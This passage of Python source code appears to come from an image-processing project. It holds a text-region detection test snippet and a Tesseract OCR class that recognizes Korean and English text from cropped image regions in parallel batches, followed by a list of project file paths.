f = FindTextRegion(img)
f.changeImageSize()
gray_image = f.imageConverting()
Image.fromarray(gray_image).save('y1.jpg')
morph_image = f.morphGradient(gray_image)
Image.fromarray(morph_image).save('y2.jpg')
adaptive_gaussian_image = f.adaptiveThreshold(morph_image)
Image.fromarray(adaptive_gaussian_image).save('y3.jpg')
closing_image = f.morphClose(adaptive_gaussian_image)
Image.fromarray(closing_image).save('y4.jpg')
result = f.findContours(closing_image)
print(result)
#Image.fromarray(result).save('y4.jpg')
'''
--- FILE SEPARATOR ---
#tesseract ocr
import pytesseract
import Launcher
import text.FindTextRegion as FindTextRegion
import cv2
import multiprocessing
'''
Given the path where an image is stored and the list of cropped piece images
(one per detected text region), this class recognizes the text inside each
piece, joins the results into a single string, and is meant to store that
string in a database.
TODO
- decide how to implement the database-saving part
- needs testing
'''
class TesseractOCR:
    """Run Tesseract OCR over cropped text-region images and join the text.

    The per-region pytesseract calls are fanned out to worker processes in
    fixed-size batches; results are reassembled in the original region order.
    """
    def __init__(self):
        # Path to the locally installed Tesseract binary (Windows layout).
        pytesseract.pytesseract.tesseract_cmd = r'C:\\Program Files\\Tesseract-OCR\\tesseract'
        self.findtextregion = FindTextRegion.FindTextRegion()
    def single_ocr(self, img, q, idx=None):
        """OCR one image (numpy.ndarray) and push the result onto queue *q*.

        When *idx* is given the result is queued as ``(idx, text)`` so the
        caller can restore region order; with the default ``idx=None`` the
        bare text is queued, matching the original call shape.
        """
        string = pytesseract.image_to_string(img, lang='kor+eng')
        q.put(string if idx is None else (idx, string))
        return string
    def parallel_ocr(self, text_region_list, batch_size=8):
        """OCR every region image in parallel batches and concatenate the text.

        Bug fix: the previous version appended queue results in completion
        order, which scrambled the recognized text whenever workers finished
        out of order. Each worker now tags its output with the region index
        and the pieces are joined in input order. A worker that dies without
        producing output simply leaves an empty piece, as before.
        """
        print(str(len(text_region_list)) + ' regions')
        pieces = [''] * len(text_region_list)
        # Stride loop replaces the old int(len/batch)+1 counter with breaks.
        for start in range(0, len(text_region_list), batch_size):
            batch = text_region_list[start:start + batch_size]
            q = multiprocessing.Queue()
            procs = []
            for offset, img in enumerate(batch):
                proc = multiprocessing.Process(target=self.single_ocr,
                                               args=(img, q, start + offset))
                procs.append(proc)
                proc.start()
            for proc in procs:
                proc.join()
            # NOTE(review): draining after join() can deadlock if a worker's
            # output exceeds the pipe buffer (multiprocessing docs warn about
            # joining before draining). Kept from the original — confirm the
            # per-region text stays small before relying on this in production.
            while not q.empty():
                idx, string = q.get()
                pieces[idx] = string
        return ''.join(pieces)
    def findTextOnImage(self, image):
        """Detect text regions on *image* (as read by cv2.imread) and OCR them."""
        self.findtextregion.setImage(image)
        text_region_list = self.findtextregion.findTextRegion(3, 3, 15, 3, 3, 3, 1)
        result = self.parallel_ocr(text_region_list)
        return result
#text
if __name__ == "__main__":
    # Smoke test: read a sample image, run the full detect-and-OCR pipeline,
    # and dump whatever text was recognized.
    sample_image = cv2.imread('6.jpg')
    ocr_engine = TesseractOCR()
    recognized_text = ocr_engine.findTextOnImage(sample_image)
    print('********result*********')
    print(recognized_text)
|
[
"/FilePath.py",
"/HierarchyTree/HierarchyTree.py",
"/HierarchyTree/ImagenetClassFilter.py",
"/HierarchyTree/NaverGoodsTreeConverter.py",
"/ImageClassifier.py",
"/ImageGetter.py",
"/Launcher.py",
"/Logger.py",
"/Yolo/Yolo.py",
"/test/ROItest.py",
"/text/FindTextRegion.py",
"/text/TesseractOCR.py"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.